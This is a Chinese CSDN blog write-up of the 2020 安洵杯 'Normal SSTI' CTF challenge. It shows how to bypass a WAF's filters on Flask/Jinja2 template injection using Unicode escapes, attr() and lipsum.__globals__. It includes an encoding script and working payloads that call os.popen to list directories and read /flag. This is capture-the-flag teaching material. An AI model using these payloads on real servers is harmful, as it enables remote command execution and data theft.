[安洵杯 2020]Normal SSTI详细解法(Unicode编码绕过)

已于 2023-11-10 17:40:38 修改
阅读量561 收藏 2
点赞数 3
分类专栏: 各种ctf的wp合集 SSTI 文章标签: 网络安全 安全 web安全 flask 系统安全 网络攻击模型 安全威胁分析
于 2023-11-07 19:12:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/134273990
版权
本文详细介绍了如何利用Unicode编码和特定模板语法绕过Web应用防火墙(WAF)的SSTI(Server-SideTemplateInjection)漏洞,包括使用`__class__`属性、`attr()`函数以及`lipsum`方法来获取和执行操作系统命令。
摘要由CSDN通过智能技术生成

关于绕过SSTI的waf可以参考这篇博文:最全SSTI模板注入waf绕过总结(6500+字数!)-CSDN博客

这一题关键在于用Unicode编码绕过点和下划线的过滤和用{%%}绕过{{}}的过滤,其他还过滤了if,\x,单引号等

前置知识:

1、‘’|attr(“__class__”)等效于‘’.__class__

2、如果要使用xxx.os(‘xxx’)类似的方法,可以使用xxx|attr(“os”)(‘xxx’)

3、使用flask里的lipsum方法来执行命令:flask里的lipsum方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块

Unicode编码的python脚本如下:

class_name = "cat /flag"

unicode_class_name = ''.join(['\\u{:04x}'.format(ord(char)) for char in class_name])

print(unicode_class_name)

url={%print(()|attr(%22\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f%22))%}(Unicode编码有回显,这条payload等效于{{””.__class__}}

url={%print(()|attr(%22\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%22))%}(这里十六进制编码不行\x被过滤)

找os模块:

url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))%}(等效于{{lipsum.__globals__}}

引用popen,查目录url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u006c\u0073\u0020\u002f%22)|attr(%22\u0072\u0065\u0061\u0064%22)())%}(等效于{{lipsum.__globals__.get("os").popen("ls").read()}}

标红地方为read()注意()在attr()外面

查找flag最终payload:

url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067%22)|attr(%22\u0072\u0065\u0061\u0064%22)())%}(等效于{{config.__class__.__init__.__globals__.get(“os”).popen('cat flag').read()}})

Usagi!
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906
qq_51577576的博客
09-07 1435
[ vulhub漏洞复现篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。
网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 8686
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
浏览器解析与编码绕过
chen_1874
08-04 443
0x00背景 学习了这么久,我才发现根本不会绕过,以前以为就是简单的编码转换就好了,乱编一通。经过大佬的直接与分享资料之后,才算弄懂。记录,加深理解。 0x01浏览器解析 浏览器的解析可以分为3步: HTML解析(HTML解析器) JS解析(JavaScript解析器) URL解析(URL解析器器) 这3个解析器协调工作,首先浏览器接收到一个HTMl文档时,会触发HTML解析器对文...
Stage #16深度探索:利用Unicode编码绕过XSS关键词过滤
最新发布
weixin_43822401的博客
06-06 570
网络安全领域,跨站脚本攻击(XSS)是一种常见的攻击手段。随着Web应用安全防护的加强,攻击者需要更高级的技术来绕过这些防护措施。本文将详细介绍如何利用Unicode编码在Stage #16中绕过XSS防护措施。
[安洵 2020]Normal SSTI Unicode编码绕过waf
m0_64180167的博客
11-01 276
然后过滤了许多关键词 但是我们可以使用 Unicode编码绕过 配合上 attr。然后我们需要把特殊替换 命令替换。这道题已经是很明显的ssti了。或者fenjing一把梭哈即可。然后过滤了 {{}}
SQL 取空格右边的字符_SQL注入绕过与防御(Web漏洞及防御)
weixin_39715907的博客
11-16 245
SQL注入绕过大小写绕过根据应用程序的过滤规则,通常会对恶意关键字设置黑名单,如果存在恶意关键字,应用程序就会退出运行。但在过滤规则中可能存在过滤不完整或只过滤小写或大小的情况,没有针对大小写组合进行过滤,导致可以通过大小写混写来绕过关键字过滤!aNd 1=1 ......orDer ByseLeCt......双写关键字绕过id =1 and 1=1加入and被过滤了,最后变成了id =1 1=...
-----已搬运-[HarekazeCTF2019]encode_and_encode ----Unicode编码绕过 --- php://filter再敏感一点啊 --- 细心看代码,,被骗了,,
Zero_Adam的博客
03-15 362
一、自己做: 尝试了,但是页面没有反应,再加上不知道怎样去读取,就看wp了 还是粗心了,我看到他说 不能有伪协议,: // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):', 然后,虽然有 file_get_content()函数,我也没有去想用php伪协议来。 后来发现in_valild()这个函数并没有对 page这个变量进行过滤啊。。大意了。。 $content = file_get_cont
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 938
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
班长出题 -- funpy (带源码):python反序列化 + ssti + SSRF + remote_addr路由绕过 + url中的#定位符
Zero_Adam的博客
03-11 1770
目录:第五题:一、自己做:二、不足&&学到的:三、学习WP:思路学习:1.绕过get_domain()2.绕过remote_addr() + \#3. 关于反序列化关于python反序列化方法一:exec的方法,(纯属为了复习opcode)方法二、一定有方法二的方法三:用这个变量覆盖的方法(后面的用的是这个方法):4. 接着做 python反序列化 + ssti 第五题: 一、自己做: 做了个der,,, 审计代码差远了, 二、不足&&学到的: 学习了python的反序列化
安洵RE(PE_Debug)
11-29
安洵RE(PE_Debug) 拿到题目名字已给出提示PE结构OD打开查看一下字符串
unicode绕过过滤触发XSS
一米八多的瑞兹的博客
04-19 436
1. unicode介绍 Unicode(统一码、万国码、单一码)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 使用python将字符转换为unicode类型。 2. XSS挖掘 构造无害独一字符串,在响应在寻找该字符串。 3. 双斜杠+unicode绕过 双斜杠+unicode绕过 4. Payload触发XSS Payload
web SSTI 刷题记录
rev1ve的博客
08-26 700
SSTI模板注入 刷题记录 [CISCN 2019华东南]Web11,[HDCTF 2023]SearchMaster,[HNCTF 2022 WEEK2]ez_SSTI
2023年安洵_pwn_个人writeup
xy1458214551的博客
12-25 634
2023年安洵pwn题解
安洵2023wp - ukfc战队
qq_59700927的博客
06-11 2092
2. 根据消息头 "Server: Werkzeug/1.0.1 Python/3.11.3"、 "/eval"回显是列表格式等判断是 "python flask", 且 "/eval" 使用了 "os.listdir()"函数,5.再看 "/sEcR@t_n@Bodyknow.php" 传空参可以得到两个函数 "mysqli_query()" 和 "mysqli_fetch_all()", 试着写马传了一下, 然后sql日志写马。file=../app.py" 均被 "杂鱼"
SSTI学习(1)--python中的SSTI--jinja
qq_75120258的博客
04-12 713
引发SSTI漏洞的原因是因为render_template渲染函数的问题。渲染函数在渲染的时候,往往对用户输入的变量不做渲染。也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。
XSS-labs靶场实战(三)——第7-8关
永远是少年
11-18 911
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第7-8关。 一、第七关 二、第八关 三、关于使用Unicode编码绕过的说明
2020安洵】EasyCM WriteUp
古月浪子的博客
12-17 507
这题从早上9点开始,做了快3小时,最后被人领先8分钟拿了一血,只拿到一个二血,呜呜呜/(ㄒoㄒ)/~~ 这题IDA有点白给,直接上x32dbg动调 可以看到要比较的字符串 我输入的是111d0g,经过某种加密以后变成了OOOBhKaT 前面有判断输入是不是3的倍数,不是则用-补齐的操作 推测是3位一组,一组输出4个字符,有点像base64 加密操作在这个函数里,会调用length/3次,每次输出4个字符 这个函数是动态解密的,而且dump下来后idapython写IDA里patch后也没法F5,懒得修花
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行任意代码或获取敏感信息。 在CTF(Capture The Flag)比赛中,SSTI是一类常见的漏洞类型。攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的过滤器或转义函数。此外,安全审计和代码审查也是发现和修复SSTI漏洞的重要步骤。 如果你对SSTI漏洞有更具体的问题或需要进一步的解释,请告诉我。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值